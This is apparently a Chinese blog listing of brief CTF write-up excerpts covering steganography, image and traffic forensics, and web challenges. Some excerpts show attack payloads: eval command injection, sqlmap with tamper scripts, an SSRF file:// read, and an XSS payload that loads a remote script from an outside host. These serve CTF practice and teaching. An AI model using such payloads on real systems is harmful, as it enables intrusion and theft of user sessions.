摘要:        
很好的一道题目 整体思路没问题 只是没反应到用 filter查看 useless.php(...) 分析源码: 
评论(0)
推荐(0)
        
            
        
        
摘要:        
命令: ``` $ cd /mnt/ ``` 就能看到 c d 盘了 进入对应目录即可    阅读全文
posted @ 2023-09-01 19:16
N0zoM1z0
阅读(120)
评论(0)
推荐(0)
        
            
        
        
摘要:        
这题考察的是 用 winhex 更改图片长宽  开头第二排两个字母对应的 xx xx 便是长和宽的值 慢    阅读全文
posted @ 2023-09-01 16:46
N0zoM1z0
阅读(123)
评论(0)
推荐(0)
        
            
        
        
摘要:        
主要是第二张GIF格式损坏 对照 第一张GIF的文件头  用winhex进行修补后分帧即可查看到flag    阅读全文
posted @ 2023-09-01 16:25
N0zoM1z0
阅读(211)
评论(0)
推荐(0)
        
            
        
        
摘要:        
# eval执行 用法 ?cmd=system("cmd") 这样传入的字符串就会被解析成系统命令 尝试 "ls"发现index.php 进入下级目录没用 #### 构造 "cd ../;ls"尝试多次发现 "cd ../../../;ls"后出现flag 
评论(0)
推荐(0)
        
            
        
        
摘要:        
还是用SQLMap实现(SQLMap太香了!) 命令格式: ``` python3 sqlmap.py -u ... --dbs --tamper "space2comment.py" ``` 然后还是选择 sqli 库 只是这次得到的 column就很离谱了 
评论(0)
推荐(0)
        
            
        
        
摘要:        
这题没有明显可见的可传的GET参数 观察源码: 这个是对于url中的GET参数 如果 参数名字为 jumpto的话就进行跳转 所以我们可以利用 ?jumpto= 来进行 xss注入 由于这题是跳转型 不能直接用 </tEXtArEa>'"><sCRiPt sRC=//uj.ci/idp></sCrI    阅读全文
posted @ 2023-09-01 11:32
N0zoM1z0
阅读(869)
评论(0)
推荐(0)
        
            
        
        
摘要:        
注意这个题要自己加闭合语句 先随便输入观察源码:  而我们的XSS语句原始是这样的: ``` '"> `    阅读全文
posted @ 2023-09-01 11:12
N0zoM1z0
阅读(135)
评论(0)
推荐(0)
        
            
        
        
摘要:        
### 内网访问 直接访问 127.0.0.1/flag.php 即可 ### 伪协议读取文件 ``` ?url=file:///var/www/html/flag.php ``` ### 302跳转bypass 所谓的302就是 ?url=... 后面的网址 等价于 ?path=... 访问网站源    阅读全文
posted @ 2023-09-01 10:34
N0zoM1z0
阅读(36)
评论(0)
推荐(0)
        
            
        
        
摘要:        
### 存储型XSS  在 XSS平台生成一个项目后 将XSS注入语句填入 name 复制该题网址到ur    阅读全文
posted @ 2023-09-01 10:21
N0zoM1z0
阅读(28)
评论(0)
推荐(0)
        
            
        
        
摘要:        
wireshark分析后能找到 flag.rar 相关的流量 同foremost将其分离后 会得到一个 含有flag.txt的zip 但是它不是伪加密。。。 用AAPR四位数爆破得到密码 解压即可得到flag{}    阅读全文
posted @ 2023-09-01 09:02
N0zoM1z0
阅读(94)
评论(0)
推荐(0)
        
            
        
        
摘要:        
结合题目判断是 F5隐写 利用工具 F5-steganography-master 用法 ``` cmd : java Extract 图片路径 ``` 打开 output.txt 可以发现是一个zip文件 里面有 flag.txt 改成 .zip后缀后发现是一个伪加密 直接修改标志位后解压即可得到    阅读全文
posted @ 2023-09-01 08:34
N0zoM1z0
阅读(92)
评论(0)
推荐(0)
        

浙公网安备 33010602011771号